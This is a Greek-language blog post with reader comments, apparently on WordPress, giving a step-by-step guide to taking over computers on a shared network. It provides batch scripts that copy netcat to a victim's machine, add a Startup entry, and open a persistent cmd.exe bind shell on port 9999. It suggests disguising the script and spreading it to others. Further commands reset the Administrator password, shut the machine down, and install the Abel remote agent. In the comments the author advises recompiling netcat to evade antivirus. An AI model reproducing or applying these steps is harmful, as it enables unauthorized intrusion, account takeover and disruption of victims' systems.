Χάκινγκ σε υπολογιστή δικτύου

Όπως όλοι γνωρίζουμε ένα trojan είναι πολύ πιθανόν να ανακαλυφθεί από τα antivirus οπότε αυτό που θα χρειαστούμε στην συγκεκριμένη περίπτωση είναι το netcat.Το netcat είναι ένα πρόγραμμα το οποίο ανοίγει μία θύρα (port) σε κάποιον υπολογιστή για να μας δώσει πρόσβαση.

Θα πρέπει λοιπόν να γράψουμε ένα batch αρχείο το οποίο θα αντιγράφει το netcat στον απομακρυσμένο υπολογιστή.Για να γίνει αυτό θα πρέπει το batch αρχείο να εκτελεστεί με κάποιον τρόπο από τον υπολογιστή που θέλουμε να χακάρουμε.

Ανοίγουμε το σημειωματάρειο και πληκτρολογούμε το ακόλουθο:

@echo off

cd\
xcopy \\yourIP\shared folder\netcat.exe
copy \\yourIP\shared folder\netcat.exe
cd «Documents and Settings»
cd «All Users»
cd «Start Menu»
cd Programs
cd Startup
xcopy \\yourIP\shared folder\Startup.bat (Αυτό είναι ένα άλλο batch αρχείο που θα γράψουμε παρακάτω)
cd\
netcat.exe -L -p 9999 -d -e cmd.exe

Σώζουμε το αρχείο σαν .bat

Το επόμενο batch αρχείο θα χρησιμοποιηθεί για να σιγουρευτούμε ότι το port που καθορίσαμε θα ανοίγει κάθε φορά που θα κάνουν εκκίνηση τα windows.Μπορούμε φυσικά να βάλουμε όποιο port επιθυμούμε.Ανοίγουμε λοιπόν το σημειωματάρειο πάλι και γράφουμε το εξής:

@echo off

cd\
netcat.exe -L -p 9999 -d -e cmd.exe

Σώζουμε το αρχείο σαν .bat.Αυτό θα είναι το αρχείο που θα αντιγραφεί στον φάκελο startup από το προηγούμενο bat που είχαμε γράψει.

Μπορούμε φυσικά να κρύψουμε αυτό το αρχείο σε ένα άλλο αρχείο και να το διαμοιράσουμε μέσα στο δίκτυο.Όταν κάποιος τρέξει το αρχείο το netcat θα αντιγραφεί στον υπολογιστή του και θα ανοίξει μία θύρα στην προκειμένη περίπτωση είναι η 9999.Μόλις η θύρα ανοίξει μπορούμε να χρησιμοποιήσουμε το telnet σε αυτήν την θύρα του απομακρυσμένου υπολογιστή και να αποκτήσουμε πλήρης πρόσβαση.

Τώρα που έχουμε πλήρης πρόσβαση το επόμενα βήμα είναι να αλλάξουμε το administrator password με την εντολή:

net user Administrator newpassword

Πλέον μπορούμε να κάνουμε ότι θέλουμε στον υπολογιστή όπως για παράδειγμα να τερματίσουμε την λειτουργία του κτλ.Μπορούμε να το κάνουμε αυτό απλώς αν μπούμε στον φάκελο System32 και πληκτρολογήσουμε το παρακάτω:

shutdown -r -t 10 -c «Hello»

Ο απομακρυσμένος υπολογιστής θα κάνει επανεκκίνηση μέσα σε 10 δευτερόλεπτα.Μπορούμε αν θέλουμε να το προχωρήσουμε ακόμα πιο μακριά απλά και μόνο αν εγκαταστήσουμε το Cain & Abel στον υπολογιστή μας και μετά εγκαταστήσουμε το Abel στον απομακρυσμένο υπολογιστή εφόσον πλέον ξέρουμε και το administrator password.Μόλις εγκατασταθεί το Abel στον απομακρυσμένο υπολογιστή μπορούμε να κάνουμε εκκίνηση και τερματισμό υπηρεσίων και πολλά περισσότερα… 

Κατεβάστε το netcat από εδώ.

Advertisements

4 Σχόλια to “Χάκινγκ σε υπολογιστή δικτύου”

  1. Λοιπόν δυο ερωτησούλες φίλε:
    1. Πως απεγκαθιστούμε την default έκδοση του όλου «ιού» από το pc; (περισσότερο επειδή θέλω να το τεστάρω)
    2. Αφού έχουμε πλήξει τον στόχο και έχει τρέξει το πρώτο bat το οποίο έχει κατεβάσει το netcat στο pc του από το site στο οποίο το έχουμε ανεβάσει, πως κάνουμε το δικό μας netcat να ακούει τις ports του δικού του; Χρειαζόμαστε να γνωρίζουμε και την ΙΡ του κάθε φορά να υποθέσω;
    Και εν τέλει με ποια ποια εντολή στο netcat το κάνουμε αυτό;
    «nc » ??
    Αυτά για αρχή

  2. 1)Διαγράφεις το netcat.exe από τους υπολογιστές στους οποίους έχει εκτελεστεί με το τρέξιμο του .bat

    2)Στην ερώτηση σου λες »έχει κατεβάσει το netcat στο pc του από το site στο οποίο το έχουμε ανεβάσει»

    Δεν ανεβάζουμε το netcat σε κανένα site.Το τρέχουμε μέσα στο δίκτυο χρησιμοποιώντας τον κοινόχρηστο φάκελο μας.Φυσικά αυτό προυποθέτει να έχουμε account στο δίκτυο.Από τον κοινόχρηστο φάκελο μας θα γίνει η αντιγραφή του netcat στον υπολογιστή του θύματος.

    Μετά όπως γράφω και στο άρθρο θα συνδεθείς με telnet.Ωστόσο αν χρειάζεται και την εντολή γράφεις nc -v [ipaddress] [port]

    Νομίζω ότι τα έχεις μπερδέψει λίγο και δεν έχεις διαβάσει σωστά το άρθρο.Α και δεν μου φαίνεσαι για τόσο noob όσο δηλώνει το όνομα σου…

  3. Καταρχήν είμαι «νούμπ» σε σχέση με πολλούς. Με έναν παντελώς άσχετο, ίσως να μην είμαι, αλλά δε με ικανοποιεί και πολύ αυτό.

    Πράγματι ψιλοπαρεξήγησα το άρθρο σου. Εγώ είχα στο μυαλό μου να οδηγήσεις το θύμα από διαφορετικό δίκτυο, στο να κατεβάσει το bat από μια τοποθεσία και κατόπιν να τρέξει μια παρόμοια διαδικασία. Υποθέτω πως ο κώδικας δε θα είναι και πολύ διαφορετικός ή κάνω λάθος; Εάν δηλαδή αντί για «your_ip/shared/…? κλπ βάλουμε ένα url με direct link προς το exe δε θα δουλέψει;
    Επίσης, γνωστό antivirus εκλαμβάνει το netcat καθ’ αυτό ως ύποπτο (!) λογισμικό, κατά συνέπεια το μπλοκάρει. Έχει διερευνηθεί αυτή η περίπτωση και εξασφαλιστεί να μη λαμβάνει χώρα στο pc του στόχου, έχοντας antivirus ενεργοποιημένο και ενημερωμένο;

  4. Κοίτα το πρώτο .bat χρησιμοποιεί τις εντολές XCOPY και COPY για να κάνει την αντιγραφή του αρχείου αλλά από φάκελο που υπάρχει ήδη στο δίκτυο.Δεν είμαι τόσο βέβαιως ότι απλά αλλάζοντας την διαδρομή με την ιστοσελίδα που θέλεις θα την κάνει πάλι την αντιγραφή.Είναι διαφορετικά πράγματα.Ωστόσο προφανώς και μπορείς να δημιουργήσεις ένα .bat λίγο διαφορετικό που να κάνει αυτήν την δουλειά που αναφέρεις.

    Το netcat είναι ένα σχετικά παλιό utility και κατά καιρούς πολλοί το χρησιμοποίησαν για αυτές τις δουλειές και για αυτό πολλά antivirus το πέρασαν στην database τους ως ύποπτο.Φυσικά επειδή πρόκειται για open source πρόγραμμα μπορείς να πάρεις τον κώδικα να τον αλλάξεις και με ένα ακόμα recompile να το κάνεις μη αναγνωρίσημο από τα antivirus στο ενδεχόμενο που ο στόχος σου τρέχει antivirus που το μπλοκάρει.

Σχολιάστε

Εισάγετε τα παρακάτω στοιχεία ή επιλέξτε ένα εικονίδιο για να συνδεθείτε:

Λογότυπο WordPress.com

Σχολιάζετε χρησιμοποιώντας τον λογαριασμό WordPress.com. Αποσύνδεση / Αλλαγή )

Φωτογραφία Twitter

Σχολιάζετε χρησιμοποιώντας τον λογαριασμό Twitter. Αποσύνδεση / Αλλαγή )

Φωτογραφία Facebook

Σχολιάζετε χρησιμοποιώντας τον λογαριασμό Facebook. Αποσύνδεση / Αλλαγή )

Φωτογραφία Google+

Σχολιάζετε χρησιμοποιώντας τον λογαριασμό Google+. Αποσύνδεση / Αλλαγή )

Σύνδεση με %s

Αρέσει σε %d bloggers: